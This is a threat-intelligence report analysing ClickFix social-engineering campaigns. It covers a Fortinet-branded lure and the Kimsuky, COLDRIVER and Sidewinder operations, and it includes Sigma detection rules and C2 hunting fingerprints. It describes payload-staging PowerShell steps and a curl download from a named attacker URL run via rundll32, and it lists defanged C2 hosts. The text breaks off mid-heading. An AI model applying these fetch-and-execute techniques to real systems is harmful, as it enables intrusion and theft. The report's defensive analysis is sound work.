Introduction
Operation Black Mirror reveals a strategic shift in adversary tradecraft: the weaponization of ClickFix as a delivery model for state-aligned operations. What began as a simple, user-driven execution trick has evolved into a reliable intrusion vector adopted by multiple APT groups, each shaping it to fit their own workflow: from lure-driven credential theft, to seamless initial access, to full operational takeover.
Attack Chain Overview
⚠️ Important Insight
ClickFix operates as a modular pipeline: lure kit → delivery host → loader → final payload.
The kit style is opinionated (consistent copy, layout blocks, link/button semantics), making it ideal for
infrastructure-driven hunting beyond single IOCs.
- Account locked / verification required
- Invoice / payment failure
- Parcel delivery correction
- HTML/HTM dropper → ZIP
- JS/VBS/HTA → LOLBAS (wscript, mshta, rundll32)
- Signed binary side-loads
- Infostealers
- RAT deployment for persistence
- Credential/session exfil → resale
Fortinet Case
In this campaign, the operators weaponize the Fortinet brand to deliver a FileFix-style payload through a ClickFix pattern. The victim is guided to run a single PowerShell command via Win+R; everything else happens silently: a payload is staged in the browser cache, reconstructed on disk under a fake FortiClient compliance folder, and executed with scheduled persistence and command-and-control traffic.
1. Redirect Chain & Fortinet-Branded Landing
The victim starts by visiting a lure URL that performs multiple redirects before resolving to a Fortinet-themed “security” page. The final landing mimics a legitimate FortiClient compliance notification and warns about an issue that must be fixed immediately.
2. Embedded JavaScript & Cache Priming
Inspection of the page source reveals an embedded JavaScript block. Once deobfuscated, the logic is concise: it calls fetch() on a GUID-like path such as /5b900a00-71e9-45cf-acc0-d872e1d6cdaa, then reads the response as a binary blob() and logs the message "Image forcée en cache" (“image forcibly cached”) to the console.
3. PowerShell One-Liner & Local Reconstruction
The page eventually exposes the core of the ClickFix technique: a single, oversized PowerShell command accompanied by
precise user instructions Win+R → paste → execute. There is no exploit,
no vulnerability abuse, no privilege trick. The victim themselves becomes the
attacker’s execution environment.
Once invoked, the command chain runs in complete silence, stitching together a sequence of tightly scoped operational
stages. Each step reconstructs, stages, and ultimately launches the payload without producing any visible artifact on screen, delivering all functionality through
invisible background execution.
Stage I — Silent Execution
A hidden PowerShell session spawns through conhost.exe. No window, no evidence the script operates fully interactive but completely invisible within the user’s session.
Stage II — FortiClient Mirage
The script assigns $k to the faux compliance path %LOCALAPPDATA%\FortiClient\compliance. Even on hosts without Fortinet installed, this structure perfectly impersonates a legitimate FortiClient directory.
Stage III — Cache Harvesting
The variable $d points to Chrome’s cache: %LOCALAPPDATA%\Google\Chrome\User Data\Default\Cache\Cache_Data\. Everything under this path is copied into $k, effectively pulling the staged payload out of browser cache.
Stage IV — Marker-Based Extraction
Each copied file is decoded via [System.Text.Encoding]::Default.GetString(). The script identifies hidden data between two markers: bTgQcBpv and mX6o0lBw, treating the enclosed segment as the embedded payload.
Stage V — ComplianceChecker.zip
The reconstructed payload is written to $k\ComplianceChecker.zip. Using Expand-Archive, the archive expands into a weaponized file set located quietly in the compliance folder.
Stage VI — Activation
The script then launches FortiClientComplianceChecker.exe. A payload that began as an opaque Chrome cache blob now executes under the guise of a Fortinet compliance tool.
4. Masquerade & User-Facing Behavior
If we take a closer look at FortiClientComplianceChecker.exe, it quickly becomes clear that it is not a legitimate Fortinet component. The executable carries the icon of Greenshot, a well-known screenshot utility, rather than the icon used by the genuine FortiClient installer. Examining the file properties further confirms the discrepancy: its original filename is reported as Greenshot.exe, indicating that the binary was repurposed and rebranded rather than built by Fortinet.
When executed, the binary displays a Fortinet-themed message box, then exits without obvious visual artefacts such as desktop shortcuts. To the user, it looks like a harmless one-time compliance scan that completed successfully.
5. Persistence & Command-and-Control
A quick look inside Task Scheduler exposes the operator’s actual objective. After execution, FortiClientComplianceChecker.exe quietly plants a scheduled task designed to guarantee continuity: it relaunches the same binary every day at 10:00, with additional triggers firing every four hours throughout the next 24-hour window. What looks like a benign compliance helper behaves like a classic persistence implant.
Monitoring TCP/IP activity with tools such as Process Explorer exposes the next phase of the operation: the binary initiates outbound communication to 20.105.216[.]35. Capturing the network stream with Fiddler Classic confirms a steady outbound flow from the fake compliance checker—evidence of an active command-and-control channel.
Inside the compliance directory, new artifacts begin to surface — including update.dll. Static inspection tools such as PEStudio reveal two exports: Starter and DllMain.
The Starter routine is responsible for spawning additional scheduled tasks, each pointing back to FortiClientComplianceChecker.exe within the same directory — all without verifying that the executable is legitimate or even present. A self-referential loop of persistence is formed, reinforcing the operator’s foothold.
6. Why This Fortinet Case Matters
This Fortinet-branded incident is a clean illustration of how ClickFix bypasses traditional email and attachment-based controls. There is no exploit in the classic sense, only, adversarial UX design and a single user-assisted command that rebuilds a payload from browser artifacts.
Clickfix Campaigns
⚠️ ClickFix: User-Driven Execution as an APT Weapon
The ClickFix technique, used by groups such as
Kimsuky and COLDRIVER, is a
highly effective form of social engineering that turns victims into the execution layer of the attack. The method
involves guiding users to a malicious webpage disguised as a legitimate login, job evaluation, or Cloudflare-style
CAPTCHA, then instructing them to manually run a PowerShell command through Win+R.
COLDRIVER leverages ClickFix to deploy backdoors such as
SIMPLEFIX against Russian civil society members, journalists, and human-rights
defenders. The resulting malware enables reconnaissance and theft of sensitive files, including
.pdf, .doc, and
.zip documents.
North Korean operators, including Kimsuky, continue to adopt ClickFix due to its reach and simplicity. It allows the
distribution of compiled malware families such as BeaverTail to less
technical victims across cryptocurrency and retail sectors: targets unlikely to possess development tools.
COLDRIVER additionally applies stealth techniques by clearing the
RunMRU registry key, erasing evidence of the user-typed malicious command and
reducing forensic visibility.
Kimsuky
🔍 Kimsuky / APT43 Tactical Evolution
The Kimsuky hacking group, linked to the North Korea–aligned threat actor
APT43, has recently been connected to campaigns that highlight a
rapid evolution in tradecraft. Their operations now move along two coordinated fronts:
1. Abuse of legitimate platforms.
Kimsuky leverages GitHub repositories as remote infrastructure
for stealer malware delivery. Malicious .lnk files hidden inside ZIP
archives execute PowerShell scripts that gather sensitive metadata running processes, host configuration,
and system details, before uploading the stolen data to attacker-controlled GitHub repositories.
2. Deepfake-enhanced social engineering.
In spear-phishing campaigns aimed at researchers, defense-sector personnel, journalists, and human-rights
advocates focused on North Korean affairs, Kimsuky abused OpenAI’s ChatGPT
to generate realistic deepfake military ID cards. These serve as lures in attack chains that mimic
ClickFix-style CAPTCHA verification pages, ultimately delivering malware
designed for data theft and remote control, marking a major expansion in Kimsuky’s psychological and technical
deception capabilities.
🔍 BeaverTail Malware: JavaScript Loader for InvisibleFerret
BeaverTail is a JavaScript malware strain most commonly propagated
through malicious or manipulated NPM packages. Designed for
credential theft and multi-stage malware delivery, BeaverTail focuses heavily on extracting cryptocurrency wallet
data and credit card information from the victim’s web browser.
Its primary function is to deploy InvisibleFerret, a multi-stage,
Python-based backdoor that grants adversaries persistent remote access. The BeaverTail payload is
aggressively obfuscated to hinder detection and analysis.
Distribution typically involves uploading weaponized NPM packages to GitHub or injecting BeaverTail code into
trusted repositories and open-source components. The discovery of Windows and
macOS variants indicates that the malware family is still under development and expanding its platform reach.
TropiDoor RAT: Multi-Stage Final Payload with FNV-Based API Resolution
TropiDoor is an advanced HTTP/S Remote Access Trojan written in C,
exhibiting notable code overlap with the PostNapTea malware family.
Deployed in November 2024, TropiDoor was delivered via fake recruiter
social engineering operations targeting developers. Victims were lured into downloading
trojanized open-source projects distributed on platforms such as Bitbucket.
TropiDoor served as the final-stage payload in a multi-step infection chain that also deployed an obfuscated
BeaverTail variant.
The RAT communicates with its C2 server via encrypted HTTP POST traffic, using
RSA and AES for
confidentiality. Its traffic is distinguished by POST parameters such as
tropi2p, gumi,
s_width, and letter, with
tropi2p loosely inspiring the malware’s name.
TropiDoor stores configuration data in a compact binary format and dynamically resolves required Windows APIs
using the Fowler–Noll–Vo (FNV) hashing algorithm. Many of its strings
are XOR-obfuscated, adding resistance to static analysis.
BeaverTail & TropiDoor: Coordinated Multi-Stage Malware Suite
⚔️ BeaverTail & TropiDoor — A Unified Kill Chain
BeaverTail and
TropiDoor operate together as a tightly integrated intrusion suite used by
North Korean threat actors. BeaverTail initiates execution, stealing browser-stored data and deploying secondary payloads,
while TropiDoor establishes an encrypted in-memory backdoor to maintain long-term access and remote control. Together,
they form a complete compromise ecosystem:
BeaverTail steals, stages, and delivers — TropiDoor controls, persists, and commands.
🐾 BeaverTail — JavaScript Infostealer & Loader
BeaverTail is a JavaScript malware family distributed through malicious or trojanized NPM packages. It functions as both an infostealer and a loader, often disguised as a file named tailwind.config.js.
🐾 Execution Initiation
BeaverTail is embedded inside project repositories, frequently masquerading as tailwind.config.js. The file contains a heavily obfuscated JavaScript routine designed to evade casual inspection and static detection.
🜂 Downloader Activation
Once executed, the obfuscated logic activates a native downloader—most notably car.dll—located in the same directory, shifting execution from JavaScript into compiled code.
🕵️ Infostealer Focus
BeaverTail targets web browsers to extract credentials, payment card data, and cryptocurrency wallet information, focusing on wallet extensions and stored secrets in browser profiles.
📦 Downloader Functions
The malware leverages tools such as curl to retrieve additional payloads, including archives named p.zi and p2.zip, which contain later-stage components.
📤 Exfiltration & Loader Role
BeaverTail both uploads exfiltrated data and downloads secondary malware such as the Python-based backdoor InvisibleFerret, acting as a staging mechanism for full compromise.
🌐 Cross-Platform Evolution
The identification of Windows and macOS variants suggests that the BeaverTail family remains under active development, with operators investing in multi-platform reach and resilience.
🜂 TropiDoor — Encrypted In-Memory RAT
TropiDoor is an advanced HTTP/S Remote Access Trojan written in C, operating entirely in memory and exhibiting code overlap with the PostNapTea RAT family. It is typically deployed by BeaverTail’s downloader as the final-stage payload in the chain.
🜂 Multi-C2 Connection Attempts
Upon execution, TropiDoor decrypts its configuration and attempts to contact four distinct C2 servers, providing redundancy and resilience against sinkholing or takedown.
🔐 System Profiling & RSA Key Exchange
After establishing a connection, the RAT collects system information and generates a 0x20-byte random key. This key is then encrypted using an RSA public key and transmitted to the C2 as part of its initial handshake.
🧬 Encrypted Session Establishment
The randomly generated key becomes the basis for AES-encrypted packet communication, securing all subsequent C2 traffic from interception and simple inspection.
🌐 Structured HTTP Parameters
TropiDoor uses a structured set of POST parameters to transmit Base64-encoded data: tropi2p for system information, gumi for the encrypted session key, s_width for a random 5-byte Session ID, and letter for commands and their results.
📡 Command Polling & Execution
To receive instructions, TropiDoor sends 400BadRequest in the letter parameter. The C2 responds with commands, and execution results are returned through the same parameter, establishing a simple yet robust C2 loop.
🧩 Extended Backdoor Capability
TropiDoor implements a catalogue of 34 backdoor commands, including file deletion, screenshot capture, process spawning, network configuration inspection, and registry operations. Command #34 is particularly notable, as it embeds direct implementations of Windows utilities such as schtasks, ping, and reg within the malware body—behavior reminiscent of LightlessCan.
🔥 Comparative Analysis: BeaverTail vs. TropiDoor
🧩 Command Handling (TropiDoor)
To receive commands, the malware sends 400BadRequest in the letter parameter to the C2 server. The server responds with instructions, and command execution results are sent back through the same letter parameter, establishing a simple but resilient bidirectional control channel.
Comparative Overview
| Nature / Classification | JavaScript malware that functions as both an infostealer and downloader. | An in-memory backdoor (HTTP/S RAT) written in C. |
|---|---|---|
| Attack Context | Often delivered via phishing and developer-themed lures, such as fake job offers (e.g. LinkedIn) or recruitment emails impersonating platforms like Dev.to. | Deployed as the final payload, operating in memory after being dropped by a downloader such as car.dll. |
| Associated Threat Group | Used by North Korean threat actors in espionage-driven campaigns. | Attributed to the same North Korean ecosystem and used alongside BeaverTail in coordinated operations. |
🐾 BeaverTail — Focus & Observed Traits
🎭 Disguise
BeaverTail was observed masquerading specifically as tailwind.config.js within project files, blending into modern web development tooling and avoiding suspicion from developers.
🎯 Targeting
The malware is highly focused on stealing cryptocurrency wallet data in addition to standard browser credentials, making it particularly impactful in environments where browser-based wallets and extensions are used.
📜 Log Confirmation
Although frequently observed in foreign-focused campaigns, execution logs related to BeaverTail have been confirmed in South Korea, indicating active targeting or collateral exposure in that region.
🜂 TropiDoor — In-Memory Backdoor Characteristics
🧠 In-Memory Operation
TropiDoor executes entirely in memory once deployed by the downloader, significantly reducing artifacts on disk and complicating forensic recovery and traditional endpoint detection.
🧩 Unique Command Behaviour
While most of its 34 documented commands map to common backdoor features such as file deletion, screenshot capture, process execution, and network configuration checks, Command #34 stands out. This command directly implements basic Windows utilities—such as schtasks, ping, and reg within the code itself, removing the need to call external binaries.
🧪 Technical Similarity
This approach of internally implementing Windows command behavior also seen in the associated downloader car.dll mirrors tradecraft observed in the LightlessCan malware family, further strengthening ties between these toolchains.
🧩 Example — Technical Analysis & Attribution Keys
🔍 Attribution Clue — BeaverTail
The use of curl to download files named p.zi and p2.zip is a well-documented behavior of BeaverTail. This activity serves as a reliable Indicator of Compromise (IOC), helping analysts quickly link the downloader activity to BeaverTail-controlled infrastructure.
🧪 Code Characteristic — TropiDoor
TropiDoor’s Command #34 internally implements basic Windows commands such as schtasks, ping, and reg directly within its own code. This unusual technique mirrors the behavior seen in the associated downloader car.dll and is strongly reminiscent of LightlessCan, providing a valuable link for attribution to related malware families.
Detection & Response Rules — Kimsuky Campaign
The following Sigma-style detection rules are designed to identify key behaviors associated with the Kimsuky campaigns described in this research. They can be adapted to SIEM, EDR, or log analytics platforms to enhance visibility around execution chains, C2 usage, file drops, and registry-based persistence.
🧬 Kimsuky AutoIt Execution Chain
Detects the AutoIt-based execution chain used by Kimsuky, including AutoIt3.exe, HNC-related command-lines and scheduled task creation. This focuses on process creation telemetry and scheduled task abuse for persistence.
title: Kimsuky AutoIt Execution Chain
id: a1b2c3d4-e5f6-7890-abcd-ef1234567890
status: experimental
description: Detects Kimsuky campaign AutoIt execution chain
author: Akatsuki Legion
date: 2025/10/14
tags:
- attack.execution
- attack.persistence
- attack.t1059.006
- attack.t1053.005
logsource:
category: process_creation
product: windows
detection:
selection_autoit:
- Image|endswith: '\AutoIt3.exe'
- OriginalFileName: 'AutoIt3.exe'
selection_hnc:
CommandLine|contains:
- 'HncUpdateTray'
- 'HncUpdate'
selection_schtasks:
Image|endswith: '\schtasks.exe'
CommandLine|contains:
- '/create'
- '/tn'
- 'Hnc'
condition: (selection_autoit and selection_hnc) or selection_schtasks
falsepositives:
- Legitimate AutoIt scripts
- System administration tasks
level: high
📡 Kimsuky Discord C2 Communication
Flags Discord-based C2 patterns where processes such as AutoIt3.exe or HncUpdateTray.exe initiate HTTPS connections to discord.com, excluding known legitimate Discord client paths.
title: Kimsuky Discord C2 Communication
id: b2c3d4e5-f6a7-8901-bcde-f23456789012
status: experimental
description: Detects Discord webhook usage by Kimsuky malware
author: Akatsuki Legion
date: 2025/10/14
logsource:
category: network_connection
product: windows
detection:
selection:
DestinationHostname|contains: 'discord.com'
DestinationPort: 443
InitiatedProcess|endswith:
- '\AutoIt3.exe'
- '\HncUpdateTray.exe'
filter:
InitiatedProcess|contains:
- '\Discord\\'
- '\DiscordPTB\\'
- '\DiscordCanary\\'
condition: selection and not filter
falsepositives:
- Legitimate Discord usage
level: high
📂 Kimsuky File Drop Pattern
Monitors for HncUpdate-related file creation patterns under roaming/local AppData, including config.bin, HncUpdateTray.exe and suspicious .au3 (AutoIt) scripts in user profiles.
title: Kimsuky File Drop Pattern
id: c3d4e5f6-a7b8-9012-cdef-345678901234
status: experimental
description: Detects file drops associated with Kimsuky campaign
author: Akatsuki Legion
date: 2025/10/14
logsource:
category: file_creation
product: windows
detection:
selection1:
TargetFilename|contains:
- '\AppData\Roaming\HncUpdate\\'
- '\AppData\Local\HncUpdate\\'
selection2:
TargetFilename|endswith:
- '\config.bin'
- '\HncUpdateTray.exe'
selection3:
TargetFilename|contains: '\AppData\\'
TargetFilename|endswith: '.au3'
condition: selection1 or selection2 or selection3
falsepositives:
- Unknown
level: high
🔐 Kimsuky Registry Persistence
Detects Run / RunOnce persistence keys referencing HncUpdate, AutoIt3.exe, or config.bin, commonly used to maintain execution after reboot.
title: Kimsuky Registry Persistence
id: d4e5f6a7-b8c9-0123-defa-456789012345
status: experimental
description: Detects registry persistence by Kimsuky malware
author: Akatsuki Legion
date: 2025/10/14
logsource:
category: registry_event
product: windows
detection:
selection:
TargetObject|contains:
- '\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\'
- '\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\\'
Details|contains:
- 'HncUpdate'
- 'AutoIt3.exe'
- 'config.bin'
condition: selection
falsepositives:
- Legitimate software installations
level: high
COLDRIVER — BatchFlix Campaign
The recent cyber espionage campaign attributed to COLDRIVER (also known as Star Blizzard, Callisto, or UNC4057)—a Russia-linked advanced persistent threat (APT) groupshows a clear focus on highly targeted intelligence collection against civil society. First identified in September 2025, the operation singled out NGOs, think tanks, independent journalists, and human rights defenders active in the Russian context.
The primary infection vector is the ClickFix social-engineering technique. Victims are lured to a malicious webpage masquerading as a legitimate information resource for Russian civil society. On that page, they are instructed to copy a command and run it via Win + R in the Windows Run dialog. This user-driven execution step triggers the download and loading of a DLL-based downloader named BAITSWITCH.
Once active, BAITSWITCH retrieves and deploys SIMPLEFIX, a PowerShell-based backdoor designed for extended reconnaissance and data theft. SIMPLEFIX enumerates host and network information, then walks user-facing locations such as Documents, Downloads, Desktop, and OneDrive hunting for files with extensions like .pdf, .doc, and .zip. The overall objective is clear: systematic collection of strategic documents from dissidents and their supporters.
🎯 Target Set
COLDRIVER’s BatchFlix activity focuses on Russian civil society: NGOs, think tanks, investigative journalists, and human rights defenders. The targeting profile underlines a campaign driven by strategic intelligence requirements rather than broad financial crime.
🧠 Initial Access — ClickFix
Victims are redirected to a themed website posing as a resource for civil society in Russia. The page instructs them to run a PowerShell command via the Windows Run dialog, turning the user into the execution environment and aligning with ClickFix-style copy–paste chains.
📥 BAITSWITCH — DLL Downloader
The malicious command loads BAITSWITCH.dll, a downloader that establishes initial contact with attacker infrastructure. BAITSWITCH is responsible for fetching and staging follow-on payloads while keeping the initial infection surface small and user-driven.
🧬 SIMPLEFIX — PowerShell Backdoor
SIMPLEFIX is a PowerShell-based backdoor deployed by BAITSWITCH. It performs host reconnaissance, collects system and network information, and maintains a flexible channel for follow-on tasking. Its codebase is tuned for document discovery and exfiltration.
📂 Data Collection Focus
SIMPLEFIX scans user-centric directories Desktop, Documents, Downloads, and OneDrive for high-value document types such as .pdf, .doc, and .zip. This reinforces the campaign’s objective: stealthy collection of strategic and potentially sensitive files from dissidents and their support networks.
| LOSTKEYS | Public Disclosure: May 2025 | This malware was used prior to its disclosure. After publication in May 2025, GTIG did not observe any further use of LOSTKEYS, indicating its immediate abandonment by COLDRIVER. |
|---|---|---|
| COLDCOPY (Lure) |
Active Before May 2025 Updated Variant From May 2025 Onward |
The COLDCOPY “ClickFix” lure was originally used to deliver LOSTKEYS. An updated variant of this lure was repurposed to deliver the new malware chain starting just five days after the LOSTKEYS disclosure in May 2025. |
| NOROBOT |
Operationalized: May 2025 Development: May–September 2025 |
COLDRIVER operationalized this malicious DLL five days after the LOSTKEYS disclosure. The earliest version was observed in May 2025. NOROBOT acts as the primary downloader and staging component for subsequent backdoors. |
| YESROBOT |
Deployment: Late May 2025 Duration: ~2 Weeks |
A cumbersome Python backdoor deployed via the earliest NOROBOT variants. GTIG observed only two deployments over a two-week period in late May before it was abandoned, likely serving as a hastily deployed stopgap following LOSTKEYS exposure. |
| MAYBEROBOT |
First Observed: Early June 2025 Preferred Backdoor: June–September 2025 |
A PowerShell backdoor that replaced YESROBOT due to its flexibility and lack of Python dependency. A simplified NOROBOT variant, first seen in early June 2025, fetched and executed MAYBEROBOT. It became the final, preferred backdoor, remaining unchanged and suggesting high operator confidence and low detection. |
| NOROBOT (Later Variants) |
Simplified Variant: June 2025 Latest Sample: Late August 2025 |
NOROBOT continued evolving through the summer of 2025, with delivery mechanisms and complexity changing between samples. A simplified loader variant appeared in June, while later builds seen in late August 2025 reintroduced cryptographic keys and added complexity to harden the toolchain. |
🧩 Unique Operational Pinpoints — COLDRIVER’s Rapid Adaptation (May 2025 Onward)
🔥 LOSTKEYS — Total Operational Abandonment
The defining trait of LOSTKEYS is its complete and immediate abandonment. Following its public disclosure in May 2025, not a single additional instance has been observed. This showcases COLDRIVER’s ability to rapidly discard compromised tooling and pivot its malware infrastructure with exceptional agility.
⚙️ YESROBOT — Operational Clumsiness
YESROBOT was a rare operational misstep. It required operators to issue commands as valid, complex Python code, making even simple operations (like file downloads) unusually difficult. This backdoor appears to have been a hastily deployed stopgap, quickly replaced after only two observed deployments due to its inefficiency and fragility.
🔐 NOROBOT — Key Splitting for Evasion
Early variants of NOROBOT introduced an advanced evasion tactic: the malware’s cryptographic key was split across several downloaded components and stored partially in the registry. This design ensured that defenders examining only a subset of the chain could not reconstruct or decrypt the final payload, significantly complicating forensics and reversing efforts.
🧬 MAYBEROBOT — Persistence via Logon Script
MAYBEROBOT replaced YESROBOT by leveraging a more subtle and flexible persistence mechanism: a logon script. This enabled the execution of a heavily obfuscated PowerShell loader that fetched and launched the final payload. Unlike earlier Python-heavy backdoors, MAYBEROBOT was streamlined, stealthier, and supported a custom, extensible communication protocolmaking it the preferred backdoor from June through September 2025.
PKCERT — Sidewinder ClickFix Campaign
In a sophisticated cyber campaign known as “Sidewinder ClickFix”, threat actors leverage a powerful combination of psychological manipulation and technical deception by impersonating national cybersecurity authorities such as PKCERT. The operation weaponizes user trust by presenting a highly realistic warning page that alerts the victim to an “urgent and critical threat” allegedly affecting national infrastructure.
The fabricated warning pressures users into installing a mandatory security patch: a patch that does not exist. What follows is a carefully engineered social-engineering sequence: victims are guided step-by-step until they are instructed to copy a command and execute it via the Windows Win + R Run dialog. This single command is, in reality, the infection vector.
Once executed, the command acts as a digital skeleton key, silently fetching and running a remote payload that compromises the system. By exploiting both the urgency of a false national emergency and the credibility of authoritative cybersecurity entities, the Sidewinder ClickFix campaign delivers a low-friction, high-impact compromise mechanism capable of quickly infiltrating targets with severe operational consequences.
🛡️ Impersonation of National Authorities
The landing pages imitate PKCERT and other official cybersecurity bodies with precision including copied logos, tone, formatting, and emergency-alert visual language to create strong user trust and pressure.
⚠️ Social Engineering Through Urgency
The warning claims that national infrastructure is under attack and that immediate user action is required. This urgency is central to bypassing rational thinking and encouraging compliance.
🧬 Command-Based Infection
The final step instructs the victim to run a PowerShell command from the Win + R Run dialog. This command retrieves and executes the malicious payload directly from attacker infrastructure the core ClickFix method.
📥 Silent Payload Retrieval
Once executed, the command silently downloads the attacker’s loader or backdoor. No UI, no warnings, and no prompts making the compromise fast and nearly invisible to unwary users.
🧨 Sidewinder ClickFix — Infection Flow & Key Characteristics
🚦 Infection Flow — What Actually Happens
In this operation, the attacker hosts a fake national-CERT webpage that displays an urgent security alert. A modal or dialog instructs the user to:
- ✦ Press Win + R
- ✦ Paste a one-liner (PowerShell or cmd snippet)
- ✦ Hit Enter to “apply the security patch”
The one-liner silently performs a remote fetch using tools such as bitsadmin, certutil, Invoke-WebRequest, or a powershell -enc payload. It retrieves a downloader (BAT, PowerShell, DLL) which then pulls the final Sidewinder payload.
🔍 Key Characteristics
This attack chain is notable for its minimal operator effort and reliance on pure social engineering. No exploit, no macro, no malicious file — the user is the execution vector.
- ✦ Extremely low friction for the attacker
- ✦ Scales easily across multiple cloned “CERT-style” sites
- ✦ User-driven command = near-zero detection surface at initial access
- ✦ Final compromise happens silently after a single pasted command
🌐 Lure Delivery — Fake PKCERT Alert Page
When the target accesses hxxps://buildthenations[.]info/PKCERT/pkcert.html, they are presented with a threatening warning claiming detection of an unauthorized attack targeting national infrastructure and government systems. The alert insists that the user must run the provided “security verification command” immediately.
This fabricated sense of urgency and national risk is the core emotional lever that drives the victim to comply without questioning the legitimacy of the instructions.
Viewing the page source reveals a reference to script[.]js near the bottom of the HTML.
The content of script[.]js seems to resemble a reCAPTCHA and relies on the user to execute a command. This appears to target only Windows users.
🧨 Sidewinder ClickFix — Behavior of the Copied Command
⏳ Execution Delay (PING-Based Sleep)
The command begins by pinging localhost multiple times. This is a classic Windows trick used as a sleep mechanism, allowing the attacker to create a delay without calling external timing functions, useful for evading some behavioral engines.
📥 Remote DLL Fetch via cURL
The command then uses curl to download a malicious DLL from:
hxxps://foxy580.github.io/koko/file.dll
It applies custom User-Agent and Accept headers to appear legitimate or evade detection. The file is then saved into the user’s %TEMP% directory.
💉 DLL Execution via rundll32.exe
Once downloaded, the malicious DLL is executed using rundll32.exe with mogrrad specified as the entry point. This pattern is consistent with numerous ClickFix-linked loaders and signals the beginning of active compromise.
📝 Activity Logging via test.bat
The command writes all previously executed steps into a BAT file named test.bat, stored in the user’s %APPDATA% directory. This may serve both as an operation log and a persistence/helper script.
▶️ Execution of test.bat
Finally, the BAT file is executed and the initial command chain exits. At this point, full control has shifted to the attacker-controlled payload and its supporting script.
Threat Hunting & C2 Pivot Playbook
Effective hunting for ClickFix-connected malware families means going beyond single IOCs and focusing on network fingerprints, header anomalies, behavioral patterns, and post-execution artifacts. The same logic applies when pivoting into APT-linked infrastructure such as Kimsuky’s BeaverTail C2 and COLDRIVER’s MAYBEROBOT C2, which now reuse the same social-engineering playbook: Win+R, paste, execute.
🐾 Hunting BeaverTail C2 (Kimsuky)
Based on research findings from ESET’s BeaverTail analysis, the malware communicates through predictable network behaviour. Even when staged through NPM packages or GitHub artefacts, BeaverTail converges on two hunting pillars: standardised ports and Express.js-style headers.
🔌 Standardised Ports
BeaverTail C2 servers rely primarily on TCP/443 and TCP/80 or on a dedicated pair of 1224/1225 ports (see deep-dive below), with very limited alternate-port variation. Unlike commodity C2 frameworks that constantly shuffle ports, BeaverTail’s infrastructure is surprisingly rigid.
Hunt idea: highlight outbound HTTPS to previously unseen IPs or GitHub-adjacent hosting where headers match an Express static profile but lack normal browser metadata.
📡 HTTP Header Fingerprints
BeaverTail commonly serves X-Powered-By: Express and Cache-Control: public, max-age=0, while omitting “human” headers such as Accept-Language, Sec-CH-* and DNT. Some variants use custom or empty User-Agent values.
These “bare metal” headers are strong C2 indicators when seen talking to GitHub Pages, static CDNs or nodes already tagged in your ClickFix infra set.
🜂 Hunting MAYBEROBOT C2 (COLDRIVER)
MAYBEROBOT uses a reduced, PowerShell-centric delivery chain: a ClickFix-style Win+R lure drops a heavily obfuscated script that speaks to minimalist nginx/1.18.0 endpoints. Instead of exotic ports or rotating domains, the operators rely on a signature header profile and stable hashes.
🧠 Minimalistic Header Profile
MAYBEROBOT C2 responses expose Server: nginx/1.18.0 with Transfer-Encoding: chunked, basic Content-Type: text/html and Content-Encoding: gzip, but typically omit compression tuning, browser CH fields and cosmetic headers like X-Powered-By.
Custom tooling can hash these headers into a HEADER_HASH, which stays stable even when the HTML body changes.
🎯 Behavioural C2 Focus
C2 traffic is short, repetitive and tightly timed – a by-product of logon-script execution and a compact PowerShell polling loop.
Hunting tip: look for recurring POST/GET pairs with near-identical timestamps, payload lengths and low-entropy bodies, especially when they follow a Win+R execution event in EDR telemetry.
🧩 Cross-Campaign Hunting Insights
Although BeaverTail (Kimsuky) and MAYBEROBOT (COLDRIVER) live in different targeting ecosystems, their operational DNA rhymes with ClickFix: script-first execution, minimal headers, and static infrastructure that leans on social engineering rather than browser exploits or drive-by chains.
🔭 Unified Detection Focus
- ✦ Outbound connections to GitHub / GitHub Pages or static hosting backing ClickFix lures.
- ✦ Bare-minimum, malformed or tool-generated header profiles (Express.js, nginx/1.18.0) lacking browser fields.
- ✦ Repeated C2 polling with identical byte size and low-entropy payloads.
- ✦ Network activity starting immediately after Win+R → PowerShell one-liner execution observed in EDR logs.
🐾 BeaverTail C2 — Deep Network Indicators
📡 Canonical BeaverTail C2 Header (Express Static Profile)
A typical BeaverTail response closely matches an Express.js static hosting profile and is highly reusable as a hunting anchor:
HTTP/1.1 200 OK
X-Powered-By: Express
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Fri, 11 Apr 2025 15:14:11 GMT
ETag: W/"66fb-196256a6270"
Content-Type: text/html; charset=UTF-8
Content-Length: 26363
Date: Tue, 07 Oct 2025 14:41:19 GMT
Connection: keep-alive
Keep-Alive: timeout=5
The combination of X-Powered-By: Express, stable ETag patterns and the absence of client headers makes this a strong signature for IDS rules and PCAP-driven threat hunting.
🔌 BeaverTail Dedicated Ports (1224 / 1225)
Beyond 80/443, BeaverTail frequently exposes a hard-coded dual-port pattern 1224 / 1225. The responses differ by port:
| PORT 1224 | PORT 1225 |
|---|---|
HTTP/1.1 404 Not Found X-Powered-By: Express Access-Control-Allow-Origin: * Content-Security-Policy: default-src 'none' X-Content-Type-Options: nosniff Content-Type: text/html; charset=utf-8 Content-Length: 139 Date: <REDACTED> Connection: keep-alive Keep-Alive: timeout=5 |
HTTP/1.1 200 OK X-Powered-By: Express Access-Control-Allow-Origin: * Access-Control-Allow-Methods: * Access-Control-Allow-Headers: * Content-Type: text/html; charset=utf-8 Accept-Ranges: bytes ETag: W/"442-UjoHDrvR//Rpkyw5kyBkkJo64Ic" Vary: Accept-Encoding Content-Encoding: gzip Date: <REDACTED> Connection: keep-alive Keep-Alive: timeout=5 Transfer-Encoding: chunked |
In practice:
• 1224 → 404 stub
• 1225 → live C2 content
This dual-port fingerprint is extremely rare across benign infrastructures and can be operationalised in network hunting, YARA-L for PCAPs, and perimeter filtering.
🎯 BeaverTail C2 — Search & Discovery IOCs
🧬 Validin — Body Hash & HTML Title
In Validin, BeaverTail infrastructure clusters nicely when pivoting on the page body hash and HTML title:
- ✦ Body Hash (SHA1): 523a070ebbd1fff469932c39932064909a3ae087
- ✦ HTML Title: L-Administrator
Hosts that match both the body hash and title, plus the Express header profile and ports 1224 / 1225, are strong BeaverTail candidates.
🌐 Censys — Banner Hash Pivot
In Censys, BeaverTail nodes can be retrieved using the HTTP banner hash:
services.banner_hashes = "sha256:366ff4f112453b13fb39d2fcad1e38f4b5a3368cc0dc99fd7e4a005551c6a312"
Combine this with port filters (1224, 1225) and Express headers to reduce noise and surface high-confidence BeaverTail clusters.
🜂 MAYBEROBOT C2 — Deep Network Indicators (COLDRIVER)
📡 Canonical MAYBEROBOT Header Profile
